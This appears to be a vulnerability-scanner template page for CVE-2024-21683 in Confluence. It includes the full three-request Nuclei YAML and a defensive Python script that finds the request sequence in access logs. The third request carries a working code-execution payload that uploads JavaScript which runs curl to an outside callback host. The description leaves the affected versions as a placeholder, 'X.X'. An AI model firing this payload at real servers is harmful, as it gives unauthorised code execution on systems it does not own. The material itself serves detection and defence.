Atlassian Confluence Data Center and Server - Remote Code Execution
ID: CVE-2024-21683
Severity: high
Author: pdresearch
Tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive
Description
Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.
YAML Source
id: CVE-2024-21683

info:
  name: Atlassian Confluence Data Center and Server - Remote Code Execution
  author: pdresearch
  severity: high
  description: |
    Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.
  reference:
    - https://confluence.atlassian.com/security/security-bulletin-may-21-2024-1387867145.html
    - https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21683
    - https://confluence.atlassian.com/pages/viewpage.action?pageId=1387867145
    - https://jira.atlassian.com/browse/CONFSERVER-95832
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 8.3
    cve-id: CVE-2024-21683
    cwe-id: CWE-78
    epss-score: 0.00043
    epss-percentile: 0.0866
    cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    fofa-query: "app=\"ATLASSIAN-Confluence\""
    product: confluence_data_center
    vendor: atlassian
  tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /dologin.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        os_username={{username}}&os_password={{password}}&login=Log+in&os_destination=
      - |
        POST /doauthenticate.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Atlassian-Token: no-check

        password={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action
      - |
        POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
        Host: {{Hostname}}
        X-Atlassian-Token: no-check
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE

        ------WebKitFormBoundaryFcBwsDjo5LkYWGWE
        Content-Disposition: form-data; name="languageFile";filename="{{randstr}}.js"
        Content-type: text/javascript

        new java.lang.ProcessBuilder["(java.lang.String[])"](["curl","{{interactsh-url}}"]).start()
        ------WebKitFormBoundaryFcBwsDjo5LkYWGWE
        Content-Disposition: form-data; name="newLanguageName"

        {{randstr}}
        ------WebKitFormBoundaryFcBwsDjo5LkYWGWE--

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 302 && status_code_2 == 302
          - contains(interactsh_protocol, 'dns')
          - contains(body_3, "confluence")
        condition: and
# digest: 4a0a0047304502202ecb32948d5e98ed89c960623a1963b4de8c5b5947d63e10fbed8c37b1cb5733022100b808dc04b12e4071441588558c6cb6180c001d519014218b5c8d03e0d98182a2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-21683.yaml"
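
For defenders, the request sequence in the template (a password-confirmation POST followed by a POST to the add-language endpoint) can also be looked for in web access logs. The Python below is an added example, not part of the template or of the Nuclei project; it assumes combined-format access logs, and the function name, field names and sample log lines are constructed for illustration.

```python
import re

# Assumption: combined log format (client, timestamp, request line, status).
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Paths taken from the template's second and third requests.
CONFIRM_PATH = "/doauthenticate.action"
UPLOAD_PATH = "/admin/plugins/newcode/addlanguage.action"

def find_language_uploads(lines):
    """Return one finding per POST to the add-language endpoint, noting
    whether the same client POSTed the password confirmation earlier in
    the log (the order the template's requests follow)."""
    confirmed = set()
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # unparseable line, or not a POST
        path = m["path"].split("?", 1)[0]  # drop any query string
        # endswith() tolerates a context path such as /confluence
        if path.endswith(CONFIRM_PATH):
            confirmed.add(m["client"])
        elif path.endswith(UPLOAD_PATH):
            findings.append({
                "client": m["client"],
                "time": m["ts"],
                "status": int(m["status"]),
                "after_confirm": m["client"] in confirmed,
            })
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [21/May/2024:10:00:01 +0000] "POST /dologin.action HTTP/1.1" 302 0 "-" "-"',
    '198.51.100.7 - - [21/May/2024:10:00:02 +0000] "POST /doauthenticate.action HTTP/1.1" 302 0 "-" "-"',
    '198.51.100.7 - - [21/May/2024:10:00:03 +0000] "POST /admin/plugins/newcode/addlanguage.action HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.9 - - [21/May/2024:10:05:00 +0000] "GET /admin/plugins/newcode/addlanguage.action HTTP/1.1" 200 4096 "-" "-"',
    '203.0.113.9 - - [21/May/2024:10:06:00 +0000] "POST /dologin.action HTTP/1.1" 302 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_language_uploads(SAMPLE_LOG):
        print(finding)
```

A finding is a lead for review rather than proof of compromise, since administrators can legitimately add code-macro languages through the same endpoint.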